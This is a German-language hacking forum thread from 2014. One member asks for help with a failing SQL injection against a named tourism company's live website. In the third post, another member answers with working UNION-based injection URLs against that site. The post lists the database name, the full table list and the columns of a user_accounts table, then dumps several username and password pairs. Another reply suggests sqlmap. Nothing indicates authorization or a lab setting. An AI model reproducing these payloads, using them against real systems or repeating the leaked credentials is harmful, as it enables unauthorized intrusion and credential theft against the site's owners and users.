Jump to content

Willkommen Gast

Navigation

Links

Als Gast hast du nur eingeschränkten Zugriff!


Sign In 

Create Account

Du bist nicht angemeldet und hast somit nur einen sehr eingeschränkten Zugriff auf die Features unserer Community.
Um vollen Zugriff zu erlangen musst du dir einen Account erstellen. Der Vorgang sollte nicht länger als 1 Minute dauern.

  • Antworte auf Themen oder erstelle deine eigenen.
  • Schalte dir alle Downloads mit Highspeed & ohne Wartezeit frei.
  • Erhalte Zugriff auf alle Bereiche und entdecke interessante Inhalte.
  • Tausche dich mich anderen Usern in der Shoutbox oder via PN aus.
 

   

Photo

Kleines SQLi Problem

- - - - -
Started by <Kevin> ,

  • Please log in to reply
2 replies to this topic

#1
<Kevin>
Posted 10 October 2014 - 14:37 Uhr

<Kevin>

    Pentester

  • Premium Member
    • Likes
    11
  • 104 posts
  • 6 Bedankt
  • Android
  • Windows
Hallo.

Es geht um folgende Seite:

Please Login HERE or Register HERE to see this link!

.com/newsdetail.php?id=7%27

Habe letztendlich Folgendes "produziert" :

Please Login HERE or Register HERE to see this link!

.com/newsdetail.php?id=-7+union+all+select+1,group_concat%28email,0x7c,name%29,3,4,5,6,7+from+greenoas_green.user_accounts#

Leider funktioniert es nicht, ich erhalte ein Error:
[b]Warning[/b]: mysql_num_rows(): supplied argument is not a valid MySQL result resource in [b]/home/greenoas/public_html/newsdetail.php[/b] on line [b]6
[/b]
Kann sich das jemand evtl. mal ansehen?

Edited by <Kevin>, 10 October 2014 - 14:40 Uhr.

#2
myman
Posted 10 October 2014 - 16:14 Uhr

myman

    Hacker

  • Premium Member
    • Likes
    143
  • 202 posts
  • 101 Bedankt
Geht es dir darum, das ganze händisch zu erlernen oder geht es um die Lücke selbst ?
Wenn du mal nicht weiter kommen kannst es es doch wissen willst, kann ich dir nur empfehlen das du dir mal den sqlmap output anfuckst ( mit -v 2/3 jenachdem ) und dann die queries die erzeugt werden nachgoogelst. so geht es mir bei sehr komplexen anfragen die ich teilweise nicht nachvollziehen kann.

hat mir bis jetzt gut geholfen.

#3
Imperial
Posted 10 October 2014 - 16:28 Uhr

Imperial

    Favoured Management

  • Premium Member
    • Likes
    544
  • 421 posts
  • 605 Bedankt
  • 340868
  • verifiziert
  • iPhone
  • Windows, Mac OS
Datenbank
greenoas_green

Link:
http://greenoasistourism.com/newsdetail.php?id=7+UNION+SELECT+1,schema_name,3,4,5,6,7+FROM+information_schema.schemata+LIMIT+1,1+--+

Tabellen
about_us
achievements
activities
adv_images
advertizing
advice
booking
branches
brochure
candidate
career
category
category_ar
certificates
cities
cities_ar
companies
consultancy
consultant
consulting
contact
contact_us
countries
country
coursecat
courses
days
egallery
eresults
etv
evaluation
events
faq
fee
feedbackeng
gallery
gallery_cat
games
ggallery
ginformation
govt_clients
gresults
gtv
house
information
inquiry
lawyers
links
management
media_pdf
medical_inquiry
news
news2
official_image
olinks
proj_category
proj_conversastion_ar
proj_conversation
projects
properties
public
registration
registration_ar
res_timings
reservation
services
subscription
tech
times
train_plan
training
trainingar
types
uaetour
user_accounts
user_accounts_ar
user_projects
userinfo
video
visitors
welcome

Link:
greenoasistourism.com/newsdetail.php?id=7+UNION+SELECT+1,table_name,3,4,5,6,7+FROM+information_schema.tables+WHERE+table_schema=database()+LIMIT+0,1+--+


Columns "user_accounts"
id
choice
pname
ptel
pmobile
pfax
paddress
pemail
cname
cactivity
ctel
cfax
cbox
caddress
cemail
cmanager
ccontact
ccontact_phone
cfaxphone
user_name
password

Link:
http://greenoasistourism.com/newsdetail.php?id=7+UNION+SELECT+1,column_name,3,4,5,6,7+FROM+information_schema.columns+WHERE+table_schema=database%28%29+AND+table_name=0x757365725f6163636f756e7473+LIMIT+0,1+--+

Dump "user_accounts"
Username:Password
ae208:apwd24hz
ae508:apwd60hz
ae608:apwd72hz

Link:
http://greenoasistourism.com/newsdetail.php?id=7+UNION+SELECT+1,concat_ws%280x3a,user_name,password%29,3,4,5,6,7+FROM+greenoas_green.user_accounts+LIMIT+0,1+--+


Alles per Hand gedumpt.
Was ne Arbeit ^^.png' class='bbc_emoticon' alt='^^' />
  • Ch!ller and FakeKeyUser like this

There Is No Business Like Coding Business

 

Thanked by 1 Member:
<Kevin>
Back to   Hilfe / Fragen / Unterstützung

  Topic Forum Started By Stats Last Post Info

user(s) are reading this topic

members, guests, anonymous users


This topic has been visited by 33 user(s)


    , <Kevin>, BackBurner, BlackZetsu, Bornload, Ch!ller, corkscrew, Cube, curlz, Download305, FakeKeyUser, FalkE, Framerater, ice, Illuministrator, Imperial, Izon, jack4flash, JudeMitHut, lamaamala, lion., lolorollo, milton3453, most_uniQue, Palimomo, paulaner, pdr0, pornoralle, Sayco, Unkiii, Xenio, xFAUSTx, XR5
Die besten Hacking Tools zum downloaden : Released, Leaked, Cracked. Größte deutschsprachige Hacker Sammlung.
  1. Toolbase.bz
  2.   Hacking & Security
  3.   Hilfe / Fragen / Unterstützung